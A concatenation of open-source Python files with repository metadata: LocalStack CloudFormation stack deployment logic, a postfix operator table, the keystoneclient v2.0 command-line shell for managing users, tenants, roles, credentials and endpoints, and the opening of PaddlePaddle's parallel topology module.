LOG.info('Unable to create stack %s: %s' % (self.stack.stack_name, e))
self.stack.set_stack_status('CREATE_FAILED')
raise
def apply_change_set(self, change_set):
action = 'CREATE'
change_set.stack.set_stack_status('%s_IN_PROGRESS' % action)
try:
self.apply_changes(change_set.stack, change_set, stack_name=change_set.stack_name, action=action)
except Exception as e:
LOG.info('Unable to apply change set %s: %s' % (change_set.metadata.get('ChangeSetName'), e))
change_set.metadata['Status'] = '%s_FAILED' % action
self.stack.set_stack_status('%s_FAILED' % action)
raise
def update_stack(self, new_stack):
self.stack.set_stack_status('UPDATE_IN_PROGRESS')
# apply changes
self.apply_changes(self.stack, new_stack, stack_name=self.stack.stack_name, action='UPDATE')
def delete_stack(self):
self.stack.set_stack_status('DELETE_IN_PROGRESS')
stack_resources = list(self.stack.resources.values())
stack_name = self.stack.stack_name
resources = dict([(r['LogicalResourceId'], common.clone_safe(r)) for r in stack_resources])
for key, resource in resources.items():
resource['Properties'] = resource.get('Properties', common.clone_safe(resource))
resource['ResourceType'] = resource.get('ResourceType') or resource.get('Type')
for resource_id, resource in resources.items():
# TODO: cache condition value in resource details on deployment and use cached value here
if evaluate_resource_condition(resource, stack_name, resources):
delete_resource(resource_id, resources, stack_name)
# update status
self.stack.set_stack_status('DELETE_COMPLETE')
# ----------------------------
# DEPENDENCY RESOLUTION UTILS
# ----------------------------
def is_deployable_resource(self, resource):
resource_type = get_resource_type(resource)
entry = get_deployment_config(resource_type)
if entry is None and resource_type not in ['Parameter', None]:
# fall back to moto resource creation (TODO: remove in the future)
long_res_type = canonical_resource_type(resource_type)
if long_res_type in parsing.MODEL_MAP:
return True
LOG.warning('Unable to deploy resource type "%s": %s' % (resource_type, resource))
return bool(entry and entry.get(ACTION_CREATE))
def is_deployed(self, resource):
resource_status = {}
resource_id = resource['LogicalResourceId']
details = retrieve_resource_details(resource_id, resource_status, self.resources, self.stack_name)
return bool(details)
def is_updateable(self, resource):
""" Return whether the given resource can be updated or not. """
if not self.is_deployable_resource(resource) or not self.is_deployed(resource):
return False
resource_type = get_resource_type(resource)
return resource_type in UPDATEABLE_RESOURCES
def all_resource_dependencies_satisfied(self, resource):
unsatisfied = self.get_unsatisfied_dependencies(resource)
return not unsatisfied
def get_unsatisfied_dependencies(self, resource):
res_deps = self.get_resource_dependencies(resource)
return self.get_unsatisfied_dependencies_for_resources(res_deps, resource)
def get_unsatisfied_dependencies_for_resources(self, resources, depending_resource=None, return_first=True):
result = {}
for resource_id, resource in iteritems(resources):
if self.is_deployable_resource(resource):
if not self.is_deployed(resource):
LOG.debug('Dependency for resource %s not yet deployed: %s %s' %
(depending_resource, resource_id, resource))
result[resource_id] = resource
if return_first:
break
return result
def get_resource_dependencies(self, resource):
result = {}
# Note: using the original, unmodified template here to preserve Ref's ...
raw_resources = self.stack.template_original['Resources']
raw_resource = raw_resources[resource['LogicalResourceId']]
dumped = json.dumps(common.json_safe(raw_resource))
for other_id, other in raw_resources.items():
if resource != other:
# TODO: traverse dict instead of doing string search!
search1 = '{"Ref": "%s"}' % other_id
search2 = '{"Fn::GetAtt": ["%s", ' % other_id
if search1 in dumped or search2 in dumped:
result[other_id] = other
if other_id in resource.get('DependsOn', []):
result[other_id] = other
return result
# -----------------
# DEPLOYMENT UTILS
# -----------------
def add_default_resource_props(self, resources=None):
resources = resources or self.resources
for resource_id, resource in resources.items():
add_default_resource_props(resource, self.stack_name, resource_id=resource_id)
def init_resource_status(self, resources=None, stack=None, action='CREATE'):
resources = resources or self.resources
stack = stack or self.stack
for resource_id, resource in resources.items():
stack.set_resource_status(resource_id, '%s_IN_PROGRESS' % action)
def update_resource_details(self, resource_id, result, stack=None, action='CREATE'):
stack = stack or self.stack
# update resource state
update_resource_details(stack, resource_id, result, action)
# update physical resource id
resource = stack.resources[resource_id]
physical_id = resource.get('PhysicalResourceId')
physical_id = physical_id or determine_resource_physical_id(resource_id, stack=stack)
if not resource.get('PhysicalResourceId') or action == 'UPDATE':
resource['PhysicalResourceId'] = physical_id
# set resource status
stack.set_resource_status(resource_id, '%s_COMPLETE' % action, physical_res_id=physical_id)
return physical_id
def get_change_config(self, action, resource, change_set_id=None):
return {
'Type': 'Resource',
'ResourceChange': {
'Action': action,
'LogicalResourceId': resource.get('LogicalResourceId'),
'PhysicalResourceId': resource.get('PhysicalResourceId'),
'ResourceType': resource.get('Type'),
'Replacement': 'False',
'ChangeSetId': change_set_id
}
}
def resource_config_differs(self, resource_new):
""" Return whether the given resource properties differ from the existing config (for stack updates). """
resource_old = self.resources[resource_new['LogicalResourceId']]
props_old = resource_old['Properties']
props_new = resource_new['Properties']
ignored_keys = ['LogicalResourceId', 'PhysicalResourceId']
old_keys = set(props_old.keys()) - set(ignored_keys)
new_keys = set(props_new.keys()) - set(ignored_keys)
if old_keys != new_keys:
return True
for key in old_keys:
if props_old[key] != props_new[key]:
return True
def merge_properties(self, resource_id, old_stack, new_stack):
old_resources = old_stack.template['Resources']
new_resources = new_stack.template['Resources']
new_resource = new_resources[resource_id]
old_resource = old_resources[resource_id] = old_resources.get(resource_id) or {}
for key, value in new_resource.items():
if key == 'Properties':
continue
old_resource[key] = old_resource.get(key, value)
old_res_props = old_resource['Properties'] = old_resource.get('Properties', {})
for key, value in new_resource['Properties'].items():
old_res_props[key] = value
# overwrite original template entirely
old_stack.template_original['Resources'][resource_id] = new_stack.template_original['Resources'][resource_id]
def apply_parameter_changes(self, old_stack, new_stack):
parameters = {p['ParameterKey']: p['ParameterValue'] for p in old_stack.metadata['Parameters']}
for key, value in new_stack.template['Parameters'].items():
parameters[key] = value.get('Default', parameters.get(key))
parameters.update({p['ParameterKey']: p['ParameterValue'] for p in new_stack.metadata['Parameters']})
for change_set in new_stack.change_sets:
parameters.update({p['ParameterKey']: p for p in change_set.metadata['Parameters']})
old_stack.metadata['Parameters'] = [
{'ParameterKey': k, 'ParameterValue': v}
for k, v in parameters.items() if v
]
def construct_changes(self, existing_stack, new_stack, initialize=False,
change_set_id=None, append_to_changeset=False):
from localstack.services.cloudformation.cloudformation_api import StackChangeSet
old_resources = existing_stack.template['Resources']
new_resources = new_stack.template['Resources']
deletes = [val for key, val in old_resources.items() if key not in new_resources]
adds = [val for key, val in new_resources.items() if initialize or key not in old_resources]
modifies = [val for key, val in new_resources.items() if key in old_resources]
changes = []
for action, items in (('Remove', deletes), ('Add', adds), ('Modify', modifies)):
for item in items:
item['Properties'] = item.get('Properties', {})
change = self.get_change_config(action, item, change_set_id=change_set_id)
changes.append(change)
# append changes to change set
if append_to_changeset and isinstance(new_stack, StackChangeSet):
new_stack.changes.extend(changes)
return changes
def apply_changes(self, existing_stack, new_stack, stack_name,
change_set_id=None, initialize=False, action=None):
old_resources = existing_stack.template['Resources']
new_resources = new_stack.template['Resources']
action = action or 'CREATE'
self.init_resource_status(old_resources, action='UPDATE')
# apply parameter changes to existing stack
self.apply_parameter_changes(existing_stack, new_stack)
# construct changes
changes = self.construct_changes(existing_stack, new_stack,
initialize=initialize, change_set_id=change_set_id)
# check if we have actual changes in the stack, and prepare properties
contains_changes = False
for change in changes:
res_action = change['ResourceChange']['Action']
resource = new_resources.get(change['ResourceChange']['LogicalResourceId'])
if res_action != 'Modify' or self.resource_config_differs(resource):
contains_changes = True
if res_action in ['Modify', 'Add']:
self.merge_properties(resource['LogicalResourceId'], existing_stack, new_stack)
if not contains_changes:
raise NoStackUpdates('No updates are to be performed.')
# merge stack outputs
existing_stack.template['Outputs'].update(new_stack.template.get('Outputs', {}))
# start deployment loop
return self.apply_changes_in_loop(changes, existing_stack, stack_name, action=action, new_stack=new_stack)
def apply_changes_in_loop(self, changes, stack, stack_name, action=None, new_stack=None):
from localstack.services.cloudformation.cloudformation_api import StackChangeSet
def _run(*args):
try:
self.do_apply_changes_in_loop(changes, stack, stack_name)
status = '%s_COMPLETE' % action
except Exception as e:
LOG.debug('Error applying changes for CloudFormation stack "%s": %s %s' % (
stack.stack_name, e, traceback.format_exc()))
status = '%s_FAILED' % action
stack.set_stack_status(status)
if isinstance(new_stack, StackChangeSet):
new_stack.metadata['Status'] = status
new_stack.metadata['ExecutionStatus'] = (
'EXECUTE_FAILED' if 'FAILED' in status else 'EXECUTE_COMPLETE')
new_stack.metadata['StatusReason'] = 'Deployment %s' % (
'failed' if 'FAILED' in status else 'succeeded')
# run deployment in background loop, to avoid client network timeouts
return start_worker_thread(_run)
def do_apply_changes_in_loop(self, changes, stack, stack_name):
# apply changes in a retry loop, to resolve resource dependencies and converge to the target state
changes_done = []
max_iters = 30
new_resources = stack.resources
# apply default props before running the loop
for resource_id, resource in new_resources.items():
add_default_resource_props(resource, stack.stack_name,
resource_id=resource_id, existing_resources=new_resources)
# start deployment loop
for i in range(max_iters):
j = 0
updated = False
while j < len(changes):
change = changes[j]
res_change = change['ResourceChange']
action = res_change['Action']
is_add_or_modify = action in ['Add', 'Modify']
resource_id = res_change['LogicalResourceId']
try:
if is_add_or_modify:
resource = new_resources[resource_id]
should_deploy = self.prepare_should_deploy_change(
resource_id, change, stack, new_resources)
LOG.debug('Handling "%s" for resource "%s" (%s/%s) type "%s" in loop iteration %s' % (
action, resource_id, j + 1, len(changes), res_change['ResourceType'], i + 1))
if not should_deploy:
del changes[j]
continue
if not self.all_resource_dependencies_satisfied(resource):
j += 1
continue
self.apply_change(change, stack, new_resources, stack_name=stack_name)
changes_done.append(change)
del changes[j]
updated = True
except DependencyNotYetSatisfied as e:
LOG.debug('Dependencies for "%s" not yet satisfied, retrying in next loop: %s' % (resource_id, e))
j += 1
if not changes:
break
if not updated:
raise Exception('Resource deployment loop completed, pending resource changes: %s' % changes)
# clean up references to deleted resources in stack
deletes = [c for c in changes_done if c['ResourceChange']['Action'] == 'Remove']
for delete in deletes:
stack.template['Resources'].pop(delete['ResourceChange']['LogicalResourceId'], None)
return changes_done
def prepare_should_deploy_change(self, resource_id, change, stack, new_resources):
resource = new_resources[resource_id]
res_change = change['ResourceChange']
action = res_change['Action']
# check resource condition, if present
if not evaluate_resource_condition(resource, stack.stack_name, new_resources):
LOG.debug('Skipping deployment of "%s", as resource condition evaluates to false' % resource_id)
return
# resolve refs in resource details
resolve_refs_recursively(stack.stack_name, resource, new_resources)
if action in ['Add', 'Modify']:
is_deployed = self.is_deployed(resource)
if action == 'Modify' and not is_deployed:
action = res_change['Action'] = 'Add'
if action == 'Add':
if not self.is_deployable_resource(resource) or is_deployed:
return False
if action == 'Modify' and not self.is_updateable(resource):
LOG.debug('Action "update" not yet implemented for CF resource type %s' % resource.get('Type'))
return False
return True
def apply_change(self, change, old_stack, new_resources, stack_name):
change_details = change['ResourceChange']
action = change_details['Action']
resource_id = change_details['LogicalResourceId']
resource = new_resources[resource_id]
if not evaluate_resource_condition(resource, stack_name, new_resources):
return
# execute resource action
if action == 'Add':
result = deploy_resource(resource_id, new_resources, stack_name)
elif action == 'Remove':
result = delete_resource(resource_id, old_stack.resources, stack_name)
elif action == 'Modify':
result = update_resource(resource_id, new_resources, stack_name)
# update resource status and physical resource id
stack_action = {'Add': 'CREATE', 'Remove': 'DELETE', 'Modify': 'UPDATE'}.get(action)
self.update_resource_details(resource_id, result, stack=old_stack, action=stack_action)
return result
| 41.971248 | 120 | 0.631361 |
c89e7821b2b450715e77bbe28b3d9de999e8117d | 793 | py | Python | src/postfix/operators.py | theProgrammerDavid/PyGraph | e6a011c75352d15c727dca3d1e33cafa62ef0e81 | [
"MIT"
] | 1 | 2017-11-07T15:59:06.000Z | 2017-11-07T15:59:06.000Z | src/postfix/operators.py | theProgrammerDavid/PyGraph | e6a011c75352d15c727dca3d1e33cafa62ef0e81 | [
"MIT"
] | 2 | 2021-03-31T14:55:56.000Z | 2021-03-31T15:01:14.000Z | src/postfix/operators.py | theProgrammerDavid/PyGraph | e6a011c75352d15c727dca3d1e33cafa62ef0e81 | [
"MIT"
] | 2 | 2019-12-19T17:44:23.000Z | 2020-01-19T08:58:02.000Z | '''
Defines multiple operators and their actions.
'''
BINARY_OPERATORS = {
"+":{"priority":3, "func":lambda x,y:x+y},
"-":{"priority":4, "func":lambda x,y:x-y},
"*":{"priority":2, "func":lambda x,y:x*y},
"/":{"priority":1, "func":lambda x,y:x/y},
"^":{"priority":0, "func":lambda x,y:x**y}
}
UNARY_OPERATORS = {
"-": {"priority":-1, "func":lambda x:-x}
}
def add_binary_operator(char, func, priority, binary = True):
'''
Add a custom operator
'''
if len(char) != 1:
raise ValueError("Identifier for an operator must be just a character!")
if binary:
BINARY_OPERATORS[char] = {"priority":priority, "func":func}
else:
UNARY_OPERATORS[char] = {"priority":priority, "func":func}
| 26.433333 | 80 | 0.553594 |
4c53cf79a6634dd6ed00790d9fdf45f667105e42 | 18,488 | py | Python | keystoneclient/v2_0/shell.py | CiscoSystems/python-keystoneclient | 1130dd70dfffb67636dac2f8cd53804f1f9fb894 | [
"Apache-1.1"
] | null | null | null | keystoneclient/v2_0/shell.py | CiscoSystems/python-keystoneclient | 1130dd70dfffb67636dac2f8cd53804f1f9fb894 | [
"Apache-1.1"
] | null | null | null | keystoneclient/v2_0/shell.py | CiscoSystems/python-keystoneclient | 1130dd70dfffb67636dac2f8cd53804f1f9fb894 | [
"Apache-1.1"
] | null | null | null | # Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack LLC.
# Copyright 2011 Nebula, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import getpass
from keystoneclient.v2_0 import client
from keystoneclient import utils
CLIENT_CLASS = client.Client
def require_service_catalog(f):
msg = ('Configuration error: Client configured to run without a service '
'catalog. Run the client using --os-auth-url or OS_AUTH_URL, '
'instead of --os-endpoint or OS_SERVICE_ENDPOINT, for example.')
def wrapped(kc, args):
if not kc.has_service_catalog():
raise Exception(msg)
return f(kc, args)
return wrapped
@utils.arg('--tenant-id', metavar='<tenant-id>',
help='Tenant ID; lists all users if not specified')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_user_list(kc, args):
"""List users"""
users = kc.users.list(tenant_id=args.tenant_id)
utils.print_list(users, ['id', 'name', 'enabled', 'email'],
order_by='name')
@utils.arg('user', metavar='<user>', help='Name or ID of user to display')
def do_user_get(kc, args):
"""Display user details."""
user = utils.find_resource(kc.users, args.user)
utils.print_dict(user._info)
@utils.arg('--name', metavar='<user-name>', required=True,
help='New user name (must be unique)')
@utils.arg('--tenant-id', metavar='<tenant-id>',
help='New user default tenant')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
@utils.arg('--pass', metavar='<pass>', dest='passwd',
help='New user password')
@utils.arg('--email', metavar='<email>',
help='New user email address')
@utils.arg('--enabled', metavar='<true|false>', default=True,
help='Initial user enabled status (default true)')
def do_user_create(kc, args):
"""Create new user"""
user = kc.users.create(args.name, args.passwd, args.email,
tenant_id=args.tenant_id,
enabled=utils.string_to_bool(args.enabled))
utils.print_dict(user._info)
@utils.arg('--name', metavar='<user-name>',
help='Desired new user name')
@utils.arg('--email', metavar='<email>',
help='Desired new email address')
@utils.arg('--enabled', metavar='<true|false>',
help='Enable or disable user')
@utils.arg('user', metavar='<user>', help='Name or ID of user to update')
def do_user_update(kc, args):
"""Update user's name, email, and enabled status"""
kwargs = {}
if args.name:
kwargs['name'] = args.name
if args.email:
kwargs['email'] = args.email
if args.enabled:
kwargs['enabled'] = utils.string_to_bool(args.enabled)
if not len(kwargs):
print "User not updated, no arguments present."
return
user = utils.find_resource(kc.users, args.user)
try:
kc.users.update(user, **kwargs)
print 'User has been updated.'
except Exception as e:
print 'Unable to update user: %s' % e
@utils.arg('--pass', metavar='<password>', dest='passwd', required=True,
help='Desired new password')
@utils.arg('user', metavar='<user>',
help='Name or ID of user to update password')
def do_user_password_update(kc, args):
"""Update user password"""
user = utils.find_resource(kc.users, args.user)
kc.users.update_password(user, args.passwd)
@utils.arg('--current-password', metavar='<current-password>',
dest='currentpasswd', required=False, help='Current password, '
'Defaults to the password as set by --os-password or '
'OS_PASSWORD')
@utils.arg('--new-password ', metavar='<new-password>', dest='newpasswd',
required=False, help='Desired new password')
def do_password_update(kc, args):
"""Update own password"""
# we are prompting for these passwords if they are not passed in
# this gives users the option not to have their password
# appear in bash history etc..
currentpasswd = args.os_password
if args.currentpasswd is not None:
currentpasswd = args.currentpasswd
if currentpasswd is None:
currentpasswd = getpass.getpass('Current Password: ')
newpasswd = args.newpasswd
while newpasswd is None:
passwd1 = getpass.getpass('New Password: ')
passwd2 = getpass.getpass('Repeat New Password: ')
if passwd1 == passwd2:
newpasswd = passwd1
kc.users.update_own_password(currentpasswd, newpasswd)
if args.os_password != newpasswd:
print "You should update the password you are using to authenticate "\
"to match your new password"
@utils.arg('user', metavar='<user>', help='Name or ID of user to delete')
def do_user_delete(kc, args):
"""Delete user"""
user = utils.find_resource(kc.users, args.user)
kc.users.delete(user)
def do_tenant_list(kc, args):
"""List all tenants"""
tenants = kc.tenants.list()
utils.print_list(tenants, ['id', 'name', 'enabled'], order_by='name')
@utils.arg('tenant', metavar='<tenant>',
help='Name or ID of tenant to display')
def do_tenant_get(kc, args):
"""Display tenant details"""
tenant = utils.find_resource(kc.tenants, args.tenant)
utils.print_dict(tenant._info)
@utils.arg('--name', metavar='<tenant-name>', required=True,
help='New tenant name (must be unique)')
@utils.arg('--description', metavar='<tenant-description>', default=None,
help='Description of new tenant (default is none)')
@utils.arg('--enabled', metavar='<true|false>', default=True,
help='Initial tenant enabled status (default true)')
def do_tenant_create(kc, args):
"""Create new tenant"""
tenant = kc.tenants.create(args.name,
description=args.description,
enabled=utils.string_to_bool(args.enabled))
utils.print_dict(tenant._info)
@utils.arg('--name', metavar='<tenant_name>',
help='Desired new name of tenant')
@utils.arg('--description', metavar='<tenant-description>', default=None,
help='Desired new description of tenant')
@utils.arg('--enabled', metavar='<true|false>',
help='Enable or disable tenant')
@utils.arg('tenant', metavar='<tenant>', help='Name or ID of tenant to update')
def do_tenant_update(kc, args):
"""Update tenant name, description, enabled status"""
tenant = utils.find_resource(kc.tenants, args.tenant)
kwargs = {}
if args.name:
kwargs.update({'name': args.name})
if args.description is not None:
kwargs.update({'description': args.description})
if args.enabled:
kwargs.update({'enabled': utils.string_to_bool(args.enabled)})
if kwargs == {}:
print "Tenant not updated, no arguments present."
return
tenant.update(**kwargs)
@utils.arg('tenant', metavar='<tenant>', help='Name or ID of tenant to delete')
def do_tenant_delete(kc, args):
"""Delete tenant"""
tenant = utils.find_resource(kc.tenants, args.tenant)
kc.tenants.delete(tenant)
@utils.arg('--name', metavar='<name>', required=True,
help='Name of new service (must be unique)')
@utils.arg('--type', metavar='<type>', required=True,
help='Service type (one of: identity, compute, network, '
'image, or object-store)')
@utils.arg('--description', metavar='<service-description>',
help='Description of service')
def do_service_create(kc, args):
"""Add service to Service Catalog"""
service = kc.services.create(args.name,
args.type,
args.description)
utils.print_dict(service._info)
def do_service_list(kc, args):
"""List all services in Service Catalog"""
services = kc.services.list()
utils.print_list(services, ['id', 'name', 'type', 'description'],
order_by='name')
@utils.arg('service', metavar='<service>',
help='Name or ID of service to display')
def do_service_get(kc, args):
"""Display service from Service Catalog"""
service = utils.find_resource(kc.services, args.service)
utils.print_dict(service._info)
@utils.arg('service', metavar='<service>',
help='Name or ID of service to delete')
def do_service_delete(kc, args):
"""Delete service from Service Catalog"""
service = utils.find_resource(kc.services, args.service)
kc.services.delete(service.id)
def do_role_list(kc, args):
"""List all roles"""
roles = kc.roles.list()
utils.print_list(roles, ['id', 'name'], order_by='name')
@utils.arg('role', metavar='<role>', help='Name or ID of role to display')
def do_role_get(kc, args):
"""Display role details"""
role = utils.find_resource(kc.roles, args.role)
utils.print_dict(role._info)
@utils.arg('--name', metavar='<role-name>', required=True,
help='Name of new role')
def do_role_create(kc, args):
"""Create new role"""
role = kc.roles.create(args.name)
utils.print_dict(role._info)
@utils.arg('role', metavar='<role>', help='Name or ID of role to delete')
def do_role_delete(kc, args):
"""Delete role"""
role = utils.find_resource(kc.roles, args.role)
kc.roles.delete(role)
@utils.arg('--user', '--user-id', '--user_id', metavar='<user>',
required=True, help='Name or ID of user')
@utils.arg('--role', '--role-id', '--role_id', metavar='<role>',
required=True, help='Name or ID of role')
@utils.arg('--tenant', '--tenant-id', metavar='<tenant>',
help='Name or ID of tenant')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_user_role_add(kc, args):
"""Add role to user"""
user = utils.find_resource(kc.users, args.user)
role = utils.find_resource(kc.roles, args.role)
if args.tenant:
tenant = utils.find_resource(kc.tenants, args.tenant)
elif args.tenant_id:
tenant = args.tenant_id
else:
tenant = None
kc.roles.add_user_role(user, role, tenant)
@utils.arg('--user', '--user-id', '--user_id', metavar='<user>',
required=True, help='Name or ID of user')
@utils.arg('--role', '--role-id', '--role_id', metavar='<role>',
required=True, help='Name or ID of role')
@utils.arg('--tenant', '--tenant-id', metavar='<tenant>',
help='Name or ID of tenant')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_user_role_remove(kc, args):
"""Remove role from user"""
user = utils.find_resource(kc.users, args.user)
role = utils.find_resource(kc.roles, args.role)
if args.tenant:
tenant = utils.find_resource(kc.tenants, args.tenant)
elif args.tenant_id:
tenant = args.tenant_id
else:
tenant = None
kc.roles.remove_user_role(user, role, tenant)
@utils.arg('--user', '--user-id', metavar='<user>',
help='List roles granted to a user')
@utils.arg('--user_id', help=argparse.SUPPRESS)
@utils.arg('--tenant', '--tenant-id', metavar='<tenant>',
help='List roles granted on a tenant')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_user_role_list(kc, args):
"""List roles granted to a user"""
if args.tenant:
tenant_id = utils.find_resource(kc.tenants, args.tenant).id
elif args.tenant_id:
tenant_id = args.tenant_id
else:
# use the authenticated tenant id as a default
tenant_id = kc.auth_tenant_id
if args.user:
user_id = utils.find_resource(kc.users, args.user).id
elif args.user_id:
user_id = args.user_id
else:
# use the authenticated user id as a default
user_id = kc.auth_user_id
roles = kc.roles.roles_for_user(user=user_id, tenant=tenant_id)
# this makes the command output a bit more intuitive
for role in roles:
role.user_id = user_id
role.tenant_id = tenant_id
utils.print_list(roles, ['id', 'name', 'user_id', 'tenant_id'],
order_by='name')
@utils.arg('--user-id', metavar='<user-id>', help='User ID')
@utils.arg('--user_id', help=argparse.SUPPRESS)
@utils.arg('--tenant-id', metavar='<tenant-id>', help='Tenant ID')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_ec2_credentials_create(kc, args):
"""Create EC2-compatible credentials for user per tenant"""
if not args.tenant_id:
# use the authenticated tenant id as a default
args.tenant_id = kc.auth_tenant_id
if not args.user_id:
# use the authenticated user id as a default
args.user_id = kc.auth_user_id
credentials = kc.ec2.create(args.user_id, args.tenant_id)
utils.print_dict(credentials._info)
@utils.arg('--user-id', metavar='<user-id>', help='User ID')
@utils.arg('--user_id', help=argparse.SUPPRESS)
@utils.arg('--access', metavar='<access-key>', required=True,
help='Access Key')
def do_ec2_credentials_get(kc, args):
"""Display EC2-compatible credentials"""
if not args.user_id:
# use the authenticated user id as a default
args.user_id = kc.auth_user_id
cred = kc.ec2.get(args.user_id, args.access)
if cred:
utils.print_dict(cred._info)
@utils.arg('--user-id', metavar='<user-id>', help='User ID')
@utils.arg('--user_id', help=argparse.SUPPRESS)
def do_ec2_credentials_list(kc, args):
"""List EC2-compatible credentials for a user"""
if not args.user_id:
# use the authenticated user id as a default
args.user_id = kc.auth_user_id
credentials = kc.ec2.list(args.user_id)
for cred in credentials:
try:
cred.tenant = getattr(kc.tenants.get(cred.tenant_id), 'name')
except Exception:
# FIXME(dtroyer): Retrieving the tenant name fails for normal
# users; stuff in the tenant_id instead.
cred.tenant = cred.tenant_id
utils.print_list(credentials, ['tenant', 'access', 'secret'])
@utils.arg('--user-id', metavar='<user-id>', help='User ID')
@utils.arg('--user_id', help=argparse.SUPPRESS)
@utils.arg('--access', metavar='<access-key>', required=True,
help='Access Key')
def do_ec2_credentials_delete(kc, args):
"""Delete EC2-compatible credentials"""
if not args.user_id:
# use the authenticated user id as a default
args.user_id = kc.auth_user_id
try:
kc.ec2.delete(args.user_id, args.access)
print 'Credential has been deleted.'
except Exception as e:
print 'Unable to delete credential: %s' % e
@utils.arg('--service', metavar='<service-type>', default=None,
help='Service type to return')
@require_service_catalog
def do_catalog(kc, args):
"""List service catalog, possibly filtered by service."""
endpoints = kc.service_catalog.get_endpoints(service_type=args.service)
for (service, service_endpoints) in endpoints.iteritems():
if len(service_endpoints) > 0:
print "Service: %s" % service
for ep in service_endpoints:
utils.print_dict(ep)
@utils.arg('--service', metavar='<service-type>', required=True,
help='Service type to select')
@utils.arg('--endpoint-type', metavar='<endpoint-type>', default='publicURL',
help='Endpoint type to select')
@utils.arg('--endpoint_type', default='publicURL',
help=argparse.SUPPRESS)
@utils.arg('--attr', metavar='<service-attribute>',
help='Service attribute to match for selection')
@utils.arg('--value', metavar='<value>',
help='Value of attribute to match')
@require_service_catalog
def do_endpoint_get(kc, args):
"""Find endpoint filtered by a specific attribute or service type"""
kwargs = {
'service_type': args.service,
'endpoint_type': args.endpoint_type,
}
if args.attr and args.value:
kwargs.update({'attr': args.attr, 'filter_value': args.value})
elif args.attr or args.value:
print 'Both --attr and --value required.'
return
url = kc.service_catalog.url_for(**kwargs)
utils.print_dict({'%s.%s' % (args.service, args.endpoint_type): url})
def do_endpoint_list(kc, args):
"""List configured service endpoints"""
endpoints = kc.endpoints.list()
utils.print_list(endpoints,
['id', 'region', 'publicurl',
'internalurl', 'adminurl', 'service_id'])
@utils.arg('--region', metavar='<endpoint-region>',
help='Endpoint region', default='regionOne')
@utils.arg('--service-id', '--service_id', metavar='<service-id>',
required=True, help='ID of service associated with Endpoint')
@utils.arg('--publicurl', metavar='<public-url>',
help='Public URL endpoint')
@utils.arg('--adminurl', metavar='<admin-url>',
help='Admin URL endpoint')
@utils.arg('--internalurl', metavar='<internal-url>',
help='Internal URL endpoint')
def do_endpoint_create(kc, args):
"""Create a new endpoint associated with a service"""
endpoint = kc.endpoints.create(args.region,
args.service_id,
args.publicurl,
args.adminurl,
args.internalurl)
utils.print_dict(endpoint._info)
@utils.arg('id', metavar='<endpoint-id>', help='ID of endpoint to delete')
def do_endpoint_delete(kc, args):
"""Delete a service endpoint"""
try:
kc.endpoints.delete(args.id)
print 'Endpoint has been deleted.'
except Exception:
print 'Unable to delete endpoint.'
@utils.arg('--wrap', metavar='<integer>', default=0,
help='wrap PKI tokens to a specified length, or 0 to disable')
@require_service_catalog
def do_token_get(kc, args):
"""Display the current user token"""
utils.print_dict(kc.service_catalog.get_token(),
wrap=int(args.wrap))
| 36.68254 | 79 | 0.640307 |
8f38ba447fcb3d59a2c609dacff7c921f01935fd | 8,820 | py | Python | python/paddle/distributed/fleet/base/topology.py | andreazanetti/Paddle | a259076dd01801e2e619237da02235a4856a96bb | [
"Apache-2.0"
] | 1 | 2021-04-28T13:47:27.000Z | 2021-04-28T13:47:27.000Z | python/paddle/distributed/fleet/base/topology.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | null | null | null | python/paddle/distributed/fleet/base/topology.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import paddle
import collections
import numpy as np
from itertools import product
from functools import reduce
from ..utils.log_util import logger
__all__ = ['CommunicateTopology', 'HybridCommunicateGroup']
_HYBRID_PARALLEL_GROUP = None
class ParallelMode(object):
DATA_PARALLEL = 0
MODEL_PARALLEL = 1
PIPELINE_PARALLEL = 2
class CommunicateTopology(object):
def __init__(self,
hybrid_group_names=["data", "pipe", "model"],
dims=[1, 1, 1]):
self._parallel_names = hybrid_group_names
self._dims = dims
self.coordinate = collections.namedtuple('Coordinate',
self._parallel_names)
self._world_size = reduce(lambda x, y: x * y, self._dims)
ranges = [range(d) for d in self._dims]
all_coordinate = [self.coordinate(*x) for x in product(*ranges)]
self._coord2rank = dict(zip(all_coordinate, range(len(all_coordinate))))
self._rank2coord = dict(
zip(self._coord2rank.values(), self._coord2rank.keys()))
def get_hybrid_group_names(self):
return self._parallel_names
def get_dim(self, axis_name):
return self._dims[self._parallel_names.index(axis_name)]
def world_size(self):
return self._world_size
def get_rank(self, **args):
assert len(args) == len(self._dims)
key = self.coordinate(**args)
assert key in self._coord2rank.keys()
return self._coord2rank[key]
def get_coord(self, rank):
assert rank < self._world_size
assert rank in self._rank2coord.keys()
return self._rank2coord[rank]
def get_axis_list(self, axis_name, index):
axis = self._parallel_names.index(axis_name)
ranks = [
self._coord2rank[coord] for coord in self._coord2rank.keys()
if coord[axis] == index
]
ranks.sort()
return ranks
def get_dim_size(self, axis_name):
assert axis_name in self._parallel_names
return self._dims[self._parallel_names.index(axis_name)]
def get_comm_list(self, axis_name):
assert axis_name in self._parallel_names
other_axis_names = [
name for name in self._parallel_names if name != axis_name
]
ranges = []
